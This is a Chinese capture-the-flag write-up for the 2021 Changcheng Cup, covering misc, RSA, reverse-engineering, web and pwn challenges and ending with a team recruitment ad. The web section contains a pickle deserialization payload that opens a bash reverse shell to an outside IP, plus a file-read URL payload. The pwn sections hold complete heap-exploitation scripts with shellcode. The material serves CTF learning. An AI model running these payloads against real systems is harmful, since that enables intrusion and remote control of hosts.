2021 长城杯ctf wp
2024-04-27 05:48:30
2021 长城杯 wp
- Misc
- 签到
- 你这flag保熟吗
- Crypto
- baby_rsa
- Reverse
- Just_cmp
- funny_js
- Web
- java_url
- ez_python
- Pwn
- K1ng_in_h3Ap_I
- K1ng_in_h3Ap_II
- Tip
Misc
签到
16进制—ASCII—base64
你这flag保熟吗
下载附件,得到两张图⽚和⼀个压缩包,压缩包需要密码
从图⽚可以提取出两个rar
得到⼀个excel和⼀个hint
hint中提示base64:(,还有⼀串不知所云的base64
excel中是分开来的单元格,每⼀个单元格都有⼀个字符串
尝试把hint中的base64带进excel,画图
是⼀个⼆阶的希尔伯特曲线,那么我们可以根据希尔伯特曲线写脚本来提取字符串得到base64(与qwb的threebody相似)
import numpy as np
from PIL import Image
from hilbertcurve.hilbertcurve import HilbertCurve
import pandas as pd
arr = pd.read_excel('./password.xls',header=None)
# arr = arr.values()
# with Image.open('threebody_new.bmp') as img:
# arr = np.asarray(img)
# arr = np.vectorize(lambda x: x&1)(arr[:,:,2])
# for x1 in range(np.size(arr,0)):
# if sum(arr[x1])>0:
# break
# for x2 in reversed(range(np.size(arr,0))):
# if sum(arr[x2])>0:
# break
# for y1 in range(np.size(arr,1)):
# if sum(arr[:,y1])>0:
# break
# for y2 in reversed(range(np.size(arr,1))):
# if sum(arr[:,y2])>0:
# break
#
# arr = arr[x1:x2+1, y1:y2+1]
hilbert_curve = HilbertCurve(17, 2)
s = ''
for i in range(np.size(arr)):[x,y] = hilbert_curve.point_from_distance(i)s += str(arr[y][x])
print(s)
# with open('output', 'wb') as f:
# f.write(int(s,2).to_bytes(2048, 'big'))
得到⼀⼤串base64,以及底下很多的“=”号,删除到只剩两个“=”号,循环解码
with open("flag.txt",'r') as f:a = f.read()
import base64
while True:a = base64.b64decode(a)print(a)
得到压缩包密码
1f_y0u_h4ve_7he_fllllllag,_I_muSt_vvant_1t!
打开压缩包,看到flag.php,是⼀⼤堆brainf**k,尝试解码未出,⼀直输出error
之后上github找到⼀个⽹站
可以观察brainfuck的栈
将整⼀个brainfuck全都扔进去
将两个字符串全都提取出来,转为ascll
最后进⾏atbash解码
Crypto
baby_rsa
爆破v,m解出flag1
from Crypto.Util.number import *
c=158087739211657463782246495540327740951985317824559041695522233035139409682928968141592884174
99220739875833754573943607047855256739976161598599903932981169979509871591999964856806929597805
90413409990182685836777838634237676850803155480224907507236671003888930626880674417908664868473
80230734589829060669723404143989284111479705939352440779254487327724736197830793283515222691708
79807064111318871074291073581343039389561175391039766936376267875184581643335916049461784753341
11522751516354570945474627251482700060185373535655149568522999563748350673544890065688536535343
4308639412035003119516693303377081576975540948311
for m in range(1024,2,-1):v=2p=pow(v, (m+1))-pow((v+1), m)while p.bit_length()<=1024:if isPrime(p):d=inverse(0x10001,p-1)text=long_to_bytes(pow(c,d,p))if len(text)==21:print(v,m)print(text)v+=1p=pow(v, (m+1))-pow((v+1), m)
最后⼀个因⼦不⼩于513位,⽽flag2⼩于512位,分解最后⼀个因⼦,按rsa解密得到flag2
from Crypto.Util.number import *
c,n,d=
(4062598101725026294523054845073895172556652025216341012456562212675473969368127164912710410903
81648527877672964036974624754596705408458221503976399230132231029126747484024275015880188664908
78394678482061561521253365550029075565507988232729032055298992792712574569704846075514624824654
12769174394411207570381404362259953049610071337869676187998254267991763157045107210789334879281
73216525934717949742271834767329806238354839910670803451849784821913424306274903985169127144519
84152960348899589532751919272583098764118161056078536781341750142553197082925070730178092561314
400518151019955104989790911460357848366016263083,
43001726046955078981344016981790445980199072066019323382068244142888931539602812318023095256474
93969725780264615034854677964754515228815860755523930288768913764574862842124768522546334611808
12387180497013207262954353767332156814157742552584194186614660104039285912429614341787308465374
71236142683517399109466429776377360118355173431016107543977241358064093102741819626163467139833
35245409447222934959847935836720345245260683379648311189207634374595839493213219944271804872063
35563104670192224346937854239966563066122627146090761196348147834381118437736495191011693260727
93596027594057988365133037041133566146897868269,
39796272592331896400626784951713239526857273168732133046667572399622660330587881579319314094557
011554851873068389016629085963086136116425352535902598378739)
p=
[191,193,627383,1720754738477317127758682285465031939891059835873975157555031327070111123628789
833299433549669619325160679719355338187877758311485785197492710491]
phi=1
for i in p:phi*=i-1
# print(d)
dd=inverse(0x10001,phi)
print(long_to_bytes(pow(c,dd,d)))
Reverse
Just_cmp
原题
https://blog.csdn.net/weixin_43876357/article/details/107875824
#-*- coding:utf-8 -*-
enc = "flag{********************************}"
m = [0x0A07370000000000, 0x380B06060A080A37, 0x3B0F0E38083B0A07, 0x373B0709060B0A3A,
0x0F38070F0D]
import binascii
flag = b''
for i in range(5):p = enc[i*8:(i+1)*8]a = binascii.b2a_hex(p.encode('ascii')[::-1])b = binascii.a2b_hex(hex(int(a,16) + m[i])[2:])[::-1]flag += b
print (flag)
funny_js
先编译 linux 的库,然后使⽤这⼀套尝试运⾏,报错
版本不对,从⽀持 bigint 的版本开始试,发现2020-01-
19 就可以运⾏了,采⽤上⾯同样的代码运⾏
因为ida⾥头看字节码发现有 rc4 的字样,密钥也在附近,似乎是2021quickjs_happygame
直接找密钥,考虑到⼀定有⼀个⽐较的步骤,所以直接改源码在 op_eq 加个hook
得到密⽂
cipher = [150, 224, 244, 68, 61, 125, 8, 239, 203, 254, 241, 113, 213, 176, 64, 106, 103,166, 185, 159, 158, 172, 9, 213, 239, 12, 100, 185, 90, 174, 107, 131, 223, 122, 229,
157
然后就直接 cyberchef 解 rc4 但是接出来完全不对
考虑还有别的操作,⽽flag格式为 flag{***},开始各种尝试,发现亦或的字符应该为 39,直接就cyberchef解了
Web
java_url
原题 payload直接打
http://eci-2zeb5ty7ty8rni5x7hr0.cloudeci1.ichunqiu.com/testURL?url=url:file:///flag
ez_python
右键查看源代码有/?pic=1.jpg,base64读⽂件
直接读app.py
发现pickle,并且有过滤R,⼀个opcode往上打
脚本
import requests
import base64
url = "http://eci-2zea2edqz7xfw48r9zj2.cloudeci1.ichunqiu.com:8888/"
opcode=b'''(S'bash -c "bash -i >& /dev/tcp/101.32.201.44/9999 0>&1"'
ios
system
.'''
headers={"Cookie":"user={}".format(str(base64.b64encode(opcode),encoding='utf-8'))}
requests.get(url,headers=headers)
弹个shell,得flag
Pwn
K1ng_in_h3Ap_I
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./pwn'
#context.arch='amd64'
while True :# try :elf=ELF(elfelf)context.arch=elf.archgdb_text='''telescope $rebase(0x202040) 16
'''if len(sys.argv)==1 :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')io=process(elfelf)# io=process(['./'],env={'LD_PRELOAD':'./'})clibc.srand(clibc.time(0))libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')io=remote('47.104.175.110',20066)clibc.srand(clibc.time(0))libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def choice(a):io.sendlineafter('>> \n',str(a))def add(a,b):choice(1)io.sendlineafter(':\n',str(a))io.sendlineafter(':\n',str(b))def edit(a,b):choice(3)io.sendlineafter(':\n',str(a))io.sendafter(':\n',b)def show():choice(666)def delete(a):choice(2)io.sendlineafter(':\n',str(a))add(0,0x88)add(1,0x68)add(2,0x68)add(3,0x88)add(4,0xf0)add(5,0xf0)show()io.recvuntil('0x')libc_base=int(io.recv(6),16)-libc.sym['printf']# libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-88-0x10libc.address=libc_basebin_sh_addr=libc.search('/bin/sh\x00').next()system_addr=libc.sym['system']
free_hook_addr=libc.sym['__free_hook']delete(0)edit(3,'\x00'*0x80+p64(0x200)+'\x00')delete(4)delete(1)add(0,0x88)delete(0)add(0,0xc8)edit(0,'\x00'*0x88+p64(0x71)+p64(libc.sym['_IO_2_1_stdout_']-0x43)[:3]+'\n')add(1,0x68)add(3,0x68)edit(3,'\x00'*0x33+p64(0xfbad1887)+p64(0)*3+'\x88'+'\n')libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['_IO_2_1_stdin_']libc.address=libc_basebin_sh_addr=libc.search('/bin/sh\x00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']delete(1)edit(0,'\x00'*0x88+p64(0x71)+p64(libc.sym['__malloc_hook']-0x23)+'\n')add(1,0x68)add(3,0x68)edit(3,'\x00'*0x13+p64(libc_base+one_gadgaet[2])+'\n')delete(1)delete(1)success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))# gdb.attach(io,gdb_text)io.interactive()# except Exception as e:# io.close()# continue# else:# continue
K1ng_in_h3Ap_II
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./pwn'
#context.arch='amd64'
while True :
# try :elf=ELF(elfelf)context.arch=elf.archgdb_text='''telescope $rebase(0x202080) 16'''if len(sys.argv)==1 :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.27.so')io=process(elfelf)# io=process(['./'],env={'LD_PRELOAD':'./'})clibc.srand(clibc.time(0))libc=ELF('/lib/x86_64-linux-gnu/libc-2.27.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :# clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.27.so')io=remote('47.104.175.110',61608)# clibc.srand(clibc.time(0))libc=ELF('./libc.so.6')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def choice(a):io.sendlineafter('>> \n',str(a))def add(a,b):choice(1)io.sendlineafter(':\n',str(a))io.sendlineafter(':\n',str(b))def edit(a,b):choice(3)io.sendlineafter(':\n',str(a))io.sendafter(':\n',b)def show(a):choice(4)io.sendlineafter(':\n',str(a))def delete(a):choice(2)io.sendlineafter(':\n',str(a))add(0,0x50)add(1,0x50)add(2,0x50)for i in range(7):edit(2,'\x00'*0x10)
delete(2)delete(0)delete(1)io.sendlineafter('>> \n','1'*0x500)show(0)libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-96-0x10-0xb0libc.address=libc_basebin_sh_addr=libc.search('/bin/sh\x00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']edit(2,p64(free_hook_addr)+'\n')add(0,0x50)add(1,0x50)add(2,0x50)add(3,0x50)add(4,0x50)add(5,0x30)add(6,0x50)free_hook_addr=libc.sym['__free_hook']new_shell_code_head_addr=free_hook_addr&0xfffffffffffff000shell1='''xor rdi,rdimov rsi,%dmov rdx,0x1000xor rax,raxsyscalljmp rsi'''%new_shell_code_head_addrpay=p64(libc.sym['setcontext']+53)+p64(free_hook_addr+0x10)+asm(shell1)edit(1,pay)srop_mprotect=SigreturnFrame()srop_mprotect.rsp=free_hook_addr+0x8srop_mprotect.rdi=new_shell_code_head_addrsrop_mprotect.rsi=0x1000srop_mprotect.rdx=4|2|1srop_mprotect.rip=libc.sym['mprotect']edit(5,str(srop_mprotect)[0x60:0x90]+'\n')edit(6,str(srop_mprotect)[0xa0:0xd0]+'\n')delete(4)shell2='''mov rax,0x67616c662f2epush raxmov rdi,rspmov rsi,0x0xor rdx,rdxmov rax,0x2
syscallmov rdi,raxmov rsi,rspmov rdx,0x100mov rax,0x0syscallmov rdi,0x1mov rsi,rspmov rdx,0x100mov rax,0x1syscall'''io.sendline(asm(shell2))success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))# gdb.attach(io,gdb_text)io.interactive()# except Exception as e:# io.close()# continue# else:# continue
Tip
你是否想要加入一个安全团队
拥有更好的学习氛围?
那就加入EDI安全,这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心。
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事,我们在为打造安全圈好的技术氛围而努力,这里绝对是你学习技术的好地方。这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。
欢迎各位大佬小白入驻,大家一起打CTF,一起进步。
我们在挖掘,不让你埋没!
你的加入可以给我们带来新的活力,我们同样也可以赠你无限的发展空间。
有意向的师傅请联系邮箱root@edisec.net(带上自己的简历,简历内容包括自己的学习方向,学习经历等)
2021 长城杯ctf wp相关推荐
- 2021羊城杯CTF wp
2021羊城杯(部分)wp Web web1 only 4 web2 EasyCurl web3 Checkin_Go web4 Cross The Side Re Pwn BabyRop Cryp ...
- 2021祥云杯 CTF pwn解 wp
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打 ...
- 2021长城杯pwn部分wp
前言: 就, 除了vmpwn都是基础glibc的heap题 king_in_heap_1: delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体 ...
- 2021祥云杯部分wp
祥云杯2021 目前只做了两道题(没办法 tcl... MISC-鸣雏恋 下载下来是个word,打开只有一句话 不太对劲,放到010里看一看发现文件头50 4B 03 04 经典压缩包了,文件后缀改成 ...
- 2021美团杯CTF ez-sql
MySQL 正则表达式 MySQL LIKE 子句 Python chr() 函数 Python ord() 函数 string - 常见的字符串操作 MySQL BINARY 函数 首先按照常规思路 ...
- 2021 长城杯 pwn K1ng_in_h3Ap_I
libc是2.23 菜单 add free 显然是有uaf. edit 就是输入 输入函数其实还有off by one. 有个后门 我们的思路就是简单的说因为有uaf但是没有show,所以我们就直接攻 ...
- 2021长城杯 RE
Just_cmp-re 猜测就是在init_array的地方修改了strcmp enc = [0x00,0x00,0x00,0x00,0x00,0x37,0x07,0x0A,0x37,0x0A,0x0 ...
- 2021 第二届天翼杯ctf
2021 天翼杯ctf wp Misc 签到 Browser Pwn ezshell Web eztp jackson easy_eval Tip Misc 签到 群公告 FLAG flag{e7gR ...
- 2021网刃杯CTF ez-sql
0x00 前言 InCTF2021原题:Vuln Drive - InCTF Internationals 2021,这里直接借用其源码. <?php include('./conf.php') ...
最新文章
- 判断是否Ajax请求
- 用python爬虫的基本步骤-Python爬虫入门:爬虫基础了解
- 实现页面打开后滚动到最底端的效果(转)
- 数据结构-堆实现优先队列(java)
- TortoiseGit清除账号密码
- boost::spirit模块实现演示语法的普通计算器示例
- c语言程序设计字节,C语言程序设计-数据类型
- Python - Django - 中间件 process_exception
- 触发死锁怎么办?MySQL 的死锁系列:锁的类型以及加锁原理了解一下!
- java皮肤_java程序的皮肤效果实现代码
- Android ADT Templates Android常用模版
- 使用fastjson读取超巨json文件引起的GC问题
- flume建立ElasticSearch索引时间的问题
- 了解分布式系统和分布式系统中需要掌握的痛点
- HTML5游子吟网页的完整代码,游子吟教学完整版古诗
- 前端开发中遇到常见问题总结
- 快速理解脏读,不可重复读,幻读
- NYOJ 253LK的旅行(凸包 对踵点)
- Unity3D中第三人称视角的镜头跟随和目标锁定
- ios emjoi java_iOS推送:Java服务器端发送表情(绘文字)